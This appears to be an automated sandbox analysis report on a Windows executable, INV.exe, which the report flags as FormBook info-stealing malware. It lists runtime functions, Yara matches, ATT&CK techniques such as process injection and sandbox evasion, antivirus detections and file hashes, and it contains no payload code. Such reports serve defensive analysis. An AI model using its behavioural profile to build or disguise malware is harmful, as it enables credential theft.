          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_010666CA
          Source: C:\Users\user\Desktop\INV.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_0106E9CF
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0106E84E
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_0106E8FB
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_01065C88
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_0106E52F
          Source: C:\Users\user\Desktop\INV.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_0106E15F
          Source: C:\Users\user\Desktop\INV.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0106755A
          Source: C:\Users\user\Desktop\INV.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0106458E
          Source: C:\Users\user\Desktop\INV.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_0106E9CF
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_0106E42F
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0106E84E
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_01065C88
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_0106E4AC
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_010660C8
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0106E8FB
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,2_2_0106771D
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_0106E724
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0106A73D
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,2_2_010677A3
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,2_2_0106E3D3
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_010666CA
          Source: C:\Users\user\Desktop\INV.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_0106E15F
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,3_2_010660C8
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,3_2_0106E3D3
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_0106E52F
          Source: C:\Users\user\Desktop\INV.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_0106755A
          Source: C:\Users\user\Desktop\INV.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,3_2_0106458E
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_0106E42F
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_0106E4AC
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,3_2_0106771D
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_0106E724
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,3_2_0106A73D
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,3_2_010677A3
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_010666CA
          Source: C:\Users\user\Desktop\INV.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_0106E9CF
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0106E84E
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_0106E8FB
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,3_2_01065C88
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01062679 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_01062679

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection111Modify Registry1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobApplication Shimming1DLL Side-Loading1Virtualization/Sandbox Evasion2LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Application Shimming1Disable or Modify Tools1Security Account ManagerSecurity Software Discovery61SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemSystem Information Discovery32Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 323458 Sample: INV.exe Startdate: 27/11/2020 Architecture: WINDOWS Score: 72 24 Malicious sample detected (through community Yara rule) 2->24 26 Antivirus / Scanner detection for submitted sample 2->26 28 Yara detected FormBook 2->28 30 Machine Learning detection for sample 2->30 8 INV.exe 1 2->8         started        process3 process4 10 INV.exe 1 8->10         started        13 conhost.exe 8->13         started        15 INV.exe 8->15         started        signatures5 32 Maps a DLL or memory area into another process 10->32 17 INV.exe 10->17         started        process6 process7 19 WerFault.exe 23 9 17->19         started        file8 22 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 19->22 dropped

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          INV.exe100%AviraADWARE/MultiPlug.Gen7
          INV.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.INV.exe.1060000.0.unpack100%AviraADWARE/MultiPlug.Gen7Download File
          4.0.INV.exe.1060000.0.unpack100%AviraADWARE/MultiPlug.Gen7Download File
          4.2.INV.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.INV.exe.1060000.0.unpack100%AviraADWARE/MultiPlug.Gen7Download File
          2.2.INV.exe.1060000.0.unpack100%AviraADWARE/MultiPlug.Gen7Download File
          3.2.INV.exe.1060000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
          0.2.INV.exe.1060000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
          4.2.INV.exe.1060000.1.unpack100%AviraADWARE/MultiPlug.Gen7Download File
          3.0.INV.exe.1060000.0.unpack100%AviraADWARE/MultiPlug.Gen7Download File

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
            		high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpfalse
                                      		high

                                      Contacted IPs

                                      No contacted IP infos

                                      General Information

                                      Joe Sandbox Version:31.0.0 Red Diamond
                                      Analysis ID:323458
                                      Start date:27.11.2020
                                      Start time:02:05:12
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 6m 39s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:INV.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:22
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal72.troj.evad.winEXE@9/4@0/0
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 47.7% (good quality ratio 44%)
                                      • Quality average: 80.9%
                                      • Quality standard deviation: 30.5%
                                      HCA Information:
                                      • Successful, ratio: 74%
                                      • Number of executed functions: 17
                                      • Number of non-executed functions: 75
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.88.21.125, 51.104.144.132, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247
                                      • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/323458/sample/INV.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      02:06:35API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INV.exe_7fa5c1fc50c97be82372a0bb1297551a3548ed7_49edae5c_07187e10\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):11318
                                      Entropy (8bit):3.766850711619048
                                      Encrypted:false
                                      SSDEEP:96:rZaZuQOl+hVkDNfypXIQcQvc6QcEDMcw3Db+HbHgg5uHjgtYsaSiYuka5o1CvnrN:NaZuQCMHBUZMXYjGd/u7sdS274It56i
                                      MD5:EFA8B9C67840D9F908C18F2FB070DFCF
                                      SHA1:3288B62685CE903BF575D1DC2D3783EC89D8F70D
                                      SHA-256:677F52CAAB368AEA97203A9B5FC83985BFF81B90CBD0CC051E05A9478559DFDA
                                      SHA-512:E0DD05D2E0D28E2D5D31692AABA0FC4A14EF0112C2CD07E06E3AD0E79DFA99066FA5A2945BB26E21CE636456CC72F577CA2E19372972EE9207C823F317FBBAAF
                                      Malicious:true
                                      Reputation:low
                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.9.1.2.7.6.6.1.8.1.9.3.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.9.1.2.7.7.0.9.7.8.7.8.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.4.6.8.0.5.9.-.0.3.d.7.-.4.0.0.a.-.a.8.2.a.-.2.5.5.7.5.5.a.b.0.4.b.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.c.b.e.2.8.c.-.3.5.0.b.-.4.5.6.7.-.8.f.6.5.-.d.2.8.0.8.2.5.b.f.b.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.2.8.-.0.0.0.1.-.0.0.1.b.-.e.e.0.f.-.d.4.7.8.5.9.c.4.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.d.3.5.a.e.9.1.5.c.2.c.9.6.f.c.6.d.3.6.c.e.5.2.8.8.0.2.e.4.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.8.0.e.8.1.b.a.b.3.4.1.e.d.a.0.d.4.0.4.b.8.f.5.f.e.d.9.3.b.c.3.b.3.5.0.c.f.b.d.!.I.N.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER12D4.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):6260
                                      Entropy (8bit):3.7234725373206197
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNi5v62LYZ2SkH+prT89brbmsfAeRjm:RrlsNih6MYZ2SkHrbFfAM6
                                      MD5:0445C4911E8BD6F8CCDECD7ECE1F0EED
                                      SHA1:F9F94B93692A1F1447E80FE4B50E39D9783B51AD
